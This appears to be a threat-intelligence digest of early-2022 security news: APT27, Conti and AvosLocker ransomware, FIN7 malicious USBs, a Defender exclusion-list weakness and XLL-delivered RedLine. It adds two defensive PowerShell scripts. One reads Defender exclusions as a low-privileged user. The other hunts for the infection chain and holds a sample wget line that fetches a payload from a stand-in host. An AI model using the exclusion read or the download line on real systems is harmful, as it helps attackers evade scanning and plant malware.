German Intelligence Services warn of APT27

February 01, 2022

Industry: N/A | Level: Tactical | Source: BleepingComputer

The German domestic intelligence service, the BfV, has released an advisory on APT27 activity targeting German commercial organizations. The group has been observed using HyperBro, an in-memory remote access trojan (RAT), as its backdoor. On the group's motives, the agency states: “It cannot be ruled out that the actors, in addition to stealing business secrets and intellectual property, also try to infiltrate the networks of (corporate) customers or service providers (supply chain attack).” The BfV's findings overlap with security-industry reporting of APT27 exploiting vulnerabilities in Zoho ManageEngine products, including ADSelfService Plus.

  • Anvilogic Scenario: TiltedTemple Campaign

RRD Victim of Conti Ransomware Attack

January 25, 2022

Industry: Communications & Marketing | Level: Strategic | Source: BleepingComputer

Communications company R.R. Donnelley & Sons (RRD) was hit by a Conti ransomware attack in December 2021 and disclosed the intrusion to the SEC in a filing dated December 27th, 2021. RRD shut down its network to contain the attack, which interrupted business operations. RRD initially reported no evidence that client data had been compromised, but on January 15th the Conti gang claimed to have stolen 2.5 GB of data. Conti has since removed the leaked data from public view, which suggests the two sides are in negotiation. The scope and impact are still developing; in its latest SEC filing RRD states, “At this time, however, the Company has become aware that certain of its corporate data was accessed and exfiltrated, the nature of which is being actively examined. Based on information known to date, the Company believes the access and exfiltration was in connection with the previously disclosed systems intrusion and not a new incident.”

Microsoft Defender Weakness

January 18, 2022

Industry: N/A | Level: Strategic | Source: BleepingComputer

SentinelOne researchers identified a weakness that lets a local, low-privileged user read Microsoft Defender's exclusion list directly from the registry. Knowing which folders, file extensions and processes are excluded from scanning, an attacker can plant and run malware from one of those locations without Defender examining it. Exclusions pushed through Group Policy are stored in the registry as well and are equally readable; because such policies apply across many hosts, a single query on one machine can reveal exclusions in force elsewhere on the network. BleepingComputer confirmed the behaviour by executing a Conti ransomware sample from an excluded folder, which Defender ignored, whereas the same sample run from a non-excluded location was blocked. The weakness affects Windows 10 21H1 and 21H2 but not Windows 11.
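
The following script is an added example, not code from the article, SentinelOne or BleepingComputer. It reads the Defender exclusion keys the way the research describes and then audits the ACL on those keys to show whether standard users can read them; run it as a non-admin user to see what a low-privilege foothold would see. The registry locations are Defender's documented keys (local exclusions under HKLM\SOFTWARE\Microsoft\Windows Defender, Group Policy exclusions under HKLM\SOFTWARE\Policies); the function names and the list of "broad" principals are this script's own choices.

```powershell
# Added example (not from the article): enumerate Microsoft Defender exclusions
# straight from the registry and audit who is allowed to read those keys.
# Run as a standard (non-admin) user to reproduce the low-privilege view.

$ExclusionRoots = @(
    'HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions'            # set locally, e.g. via Set-MpPreference
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions'   # pushed by Group Policy
)
$ExclusionKinds = 'Paths', 'Extensions', 'Processes'

function Get-DefenderExclusionsFromRegistry {
    # Each exclusion is stored as a value NAME under the Paths/Extensions/Processes
    # subkeys (the value data is just 0), so the value names are the exclusion list.
    foreach ($root in $ExclusionRoots) {
        $source = if ($root -like '*\Policies\*') { 'GroupPolicy' } else { 'Local' }
        foreach ($kind in $ExclusionKinds) {
            $keyPath = Join-Path $root $kind
            $key = Get-Item -Path $keyPath -ErrorAction SilentlyContinue
            if ($null -eq $key) { continue }   # key absent, or this account cannot read it
            foreach ($name in $key.GetValueNames()) {
                [pscustomobject]@{ Source = $source; Kind = $kind; Exclusion = $name }
            }
        }
    }
}

function Test-ExclusionKeysReadableByStandardUsers {
    # Lists ACL entries that grant QueryValues (read) on the exclusion keys to broad,
    # low-privilege principals. Any output means a standard user can read the exclusions.
    $broadPrincipals = 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
                       'Everyone', 'NT AUTHORITY\INTERACTIVE'
    $queryValues = [System.Security.AccessControl.RegistryRights]::QueryValues
    foreach ($root in $ExclusionRoots) {
        foreach ($kind in $ExclusionKinds) {
            $keyPath = Join-Path $root $kind
            if (-not (Test-Path -Path $keyPath)) { continue }
            $acl = Get-Acl -Path $keyPath -ErrorAction SilentlyContinue
            if ($null -eq $acl) { continue }
            foreach ($ace in $acl.Access) {
                if ($ace.AccessControlType -eq 'Allow' -and
                    $broadPrincipals -contains $ace.IdentityReference.Value -and
                    (($ace.RegistryRights -band $queryValues) -ne 0)) {
                    [pscustomobject]@{
                        Key       = $keyPath
                        Principal = $ace.IdentityReference.Value
                        Rights    = $ace.RegistryRights
                    }
                }
            }
        }
    }
}

Get-DefenderExclusionsFromRegistry        | Format-Table -AutoSize
Test-ExclusionKeysReadableByStandardUsers | Format-Table -AutoSize
```

Compare the first function's output with `Get-MpPreference | Select-Object ExclusionPath, ExclusionExtension, ExclusionProcess` run from an elevated prompt: the cmdlet requires administrative rights, the registry read does not, which is the whole weakness. The second function is the check to run after patching or on Windows 11 to confirm that broad principals no longer hold read rights on the keys.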

AvosLocker Targets VMware ESXi

January 05, 2022

Industry: N/A | Level: Strategic | Source: BleepingComputer

AvosLocker has added Linux support to its ransomware arsenal, with researchers identifying a new variant targeting VMware ESXi servers. Threat researcher Christiaan Beek (@ChristiaanBeek) identified one victim, an unnamed organization, that received a $1 million ransom demand. Few technical details have been released, but what is known is that the ransomware terminates running VMs before encrypting, appends the extension “.avoslinux” to encrypted files, and drops a ransom note. The note also instructs victims not to shut down their computers, to “avoid file corruption.”

FIN7 and Bad USBs

January 05, 2022

Industry: Defense | Level: Tactical | Source: BleepingComputer

A flash alert from the Federal Bureau of Investigation (FBI) warns of FIN7 mailing malicious USB devices, some carrying the “LilyGO” logo, to organizations in the US defense industry. The campaign appears to have been active since August 2021 and uses several impersonation lures: packages pose as coming from Amazon or the US Department of Health & Human Services (HHS) and are accompanied by COVID-19 guidelines or thank-you letters. Once plugged in, a device registers itself as a keyboard and injects keystrokes that install malware, which then retrieves further payloads and can end in ransomware deployment. Tooling observed includes Metasploit, Cobalt Strike, Carbanak, the Griffon backdoor, and PowerShell scripts.

  • Anvilogic Use Cases:
    • PowerShell Script Keylogger
    • Executable File Written to Disk
    • Executable Process from Suspicious Folder
    • Wscript/Cscript Execution

AvosLocker Ransomware Backtracks

December 29, 2021

Industry: Government | Level: Strategic | Source: BleepingComputer

A US police department was breached by AvosLocker last month, with data exfiltrated and systems encrypted. According to a screenshot shared on Twitter by security researcher pancak3, the gang handed the decryptor to the agency after learning the victim was a US government entity. No information was given about what data was stolen.

Broward Health Data Breach

December 29, 2021

Industry: Health | Level: Strategic | Source: BleepingComputer

Florida-based Broward Health has disclosed a data breach that occurred on October 15th, 2021 and affected 1,357,879 individuals. The organization detected the intrusion four days later and notified the FBI and the US Department of Justice the same day. The attacker accessed the hospital network and patient data including names, dates of birth, physical addresses, phone numbers, financial information, Social Security numbers, email addresses, and medical information and history, among other fields.

McMenamins Suffers Conti Ransomware Attack

December 21, 2021

Industry: Hospitality, Food & Beverage | Level: Strategic | Source: BleepingComputer

A Conti ransomware attack disrupted operations at Portland brewery and hotel chain McMenamins. The attack took place on December 12th, 2021 and hit point-of-sale systems, servers, and workstations, forcing McMenamins to shut down its IT systems. The investigation is ongoing, and whether customer data was affected is not yet known.

Sports Gear Sites Data Breach Impacts 1.8 Million People

December 21, 2021

Industry: Retail | Level: Strategic | Source: BleepingComputer

A law firm representing four affiliated online sports gear retailers, Tackle Warehouse LLC, Running Warehouse LLC, Tennis Warehouse LLC and Skate Warehouse LLC, has disclosed a cyberattack in which payment card information belonging to 1,813,224 customers was stolen. The breach was identified on October 15th and confirmed on November 29th. Compromised data includes names, financial account numbers, credit/debit card numbers with CVV, and website account passwords. No details of the attack itself were provided; the companies sent notices to affected customers but offered no identity protection service.

Microsoft Excel (XLL) Leads to RedLine Info-Stealer

December 01, 2021

Industry: N/A | Level: Tactical | Source: BleepingComputer

Threat actors are using public discussion forums and article comment systems to spread malicious Excel add-ins that ultimately download and install the RedLine information stealer. The posted links point to Google Drive and download an XLL file, which BleepingComputer describes as “an add-in that allows developers to extend the functionality of Excel by reading and writing data, importing data from other sources, or creating custom functions to perform various tasks. XLL files are simply a DLL file that includes an ‘xlAutoOpen’ function executed by Microsoft Excel when the add-in is opened.” BleepingComputer's own tests did not execute successfully, possibly because of an incompatible Excel version, but the observed sequence is that the DLL is run with regsvr32 or rundll32, extracts a wget.exe binary, and uses it to download the RedLine payload, saved as %UserProfile%\JavaBridge32.exe. An autorun registry entry is then created so the binary launches at logon, giving the malware persistence.

  • Anvilogic Scenario: Malicious Document Delivering Malware
  • Anvilogic Use Cases:
    • regsvr32 Execution
    • Rundll32 Command Line
    • Invoke-WebRequest Command
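
The script below is an added example and is not code from the article or from the RedLine campaign itself. It turns the chain described above into two checks: a hunt over process-creation records for the regsvr32/rundll32 loading an .xll file, wget.exe being spawned by Excel or a loader, and an executable running from a user profile root, plus a persistence check on the live host's Run/RunOnce keys. The process records are constructed for illustration in the shape a Sysmon Event ID 1 or EDR export would give (Parent, Image, CommandLine); the user name, download URL and add-in file name in them are made up, while wget.exe and %UserProfile%\JavaBridge32.exe come from the write-up. Function names and regexes are this script's own.

```powershell
# Added example (not from the article): hunt for the XLL -> wget.exe -> RedLine
# chain over constructed process-creation records, then check Run keys for the
# persistence step. Sample records are made up for illustration.

$SampleEvents = @(
    [pscustomobject]@{ Parent='C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE'
                       Image='C:\Windows\System32\regsvr32.exe'
                       CommandLine='regsvr32.exe /s "C:\Users\alice\Downloads\invoice.xll"' }
    [pscustomobject]@{ Parent='C:\Windows\System32\regsvr32.exe'
                       Image='C:\Users\alice\AppData\Local\Temp\wget.exe'
                       CommandLine='wget.exe -O C:\Users\alice\JavaBridge32.exe http://example.invalid/payload' }
    [pscustomobject]@{ Parent='C:\Windows\explorer.exe'                      # benign rundll32 use, should not fire
                       Image='C:\Windows\System32\rundll32.exe'
                       CommandLine='rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL' }
    [pscustomobject]@{ Parent='C:\Windows\explorer.exe'
                       Image='C:\Users\alice\JavaBridge32.exe'
                       CommandLine='C:\Users\alice\JavaBridge32.exe' }
)

function Find-XllChain {
    param([Parameter(Mandatory)][object[]]$Events)

    # Executables sitting directly in a user profile root (not a subfolder) are rare for legitimate software.
    $profileRootExe = '^[A-Za-z]:\\Users\\[^\\]+\\[^\\]+\.exe$'

    foreach ($e in $Events) {
        $hits = @()
        if ($e.Image -match '\\(regsvr32|rundll32)\.exe$' -and $e.CommandLine -match '\.xll\b') {
            $hits += 'regsvr32/rundll32 loading an .xll add-in'
        }
        if ($e.Image -match '\\wget\.exe$' -and $e.Parent -match '\\(excel|regsvr32|rundll32)\.exe$') {
            $hits += 'wget.exe spawned by Excel or a DLL loader'
        }
        if ($e.Image -match $profileRootExe) {
            $hits += 'executable running from a user profile root'
        }
        foreach ($h in $hits) {
            [pscustomobject]@{ Indicator = $h; Image = $e.Image; CommandLine = $e.CommandLine }
        }
    }
}

function Get-SuspiciousRunKeyEntries {
    # Persistence check on the live host: Run/RunOnce values whose target lives in a
    # user-writable location. Expect some benign entries (updaters in AppData); this is for triage.
    $runKeys = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
               'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
               'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
               'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
    foreach ($k in $runKeys) {
        $key = Get-Item -Path $k -ErrorAction SilentlyContinue
        if ($null -eq $key) { continue }
        foreach ($name in $key.GetValueNames()) {
            $value = [string]$key.GetValue($name)
            if ($value -match '\\Users\\[^\\]+\\[^\\]+\.exe' -or $value -match '\\(AppData|Temp|ProgramData)\\') {
                [pscustomobject]@{ Key = $k; Name = $name; Command = $value }
            }
        }
    }
}

# On the sample data the first function returns three indicators (the .xll load,
# the wget.exe child of regsvr32, and JavaBridge32.exe running from the profile root).
Find-XllChain -Events $SampleEvents | Format-Table -AutoSize
Get-SuspiciousRunKeyEntries         | Format-Table -AutoSize
```

To use the first function against real telemetry, map your Sysmon or EDR fields onto the Parent/Image/CommandLine properties and pipe the records in; the third sample record is there to show that ordinary rundll32 usage does not fire. The Run-key check deliberately matches the profile-root pattern separately from AppData/Temp/ProgramData so that the article's specific indicator stands out from the noisier, usually benign, updater entries.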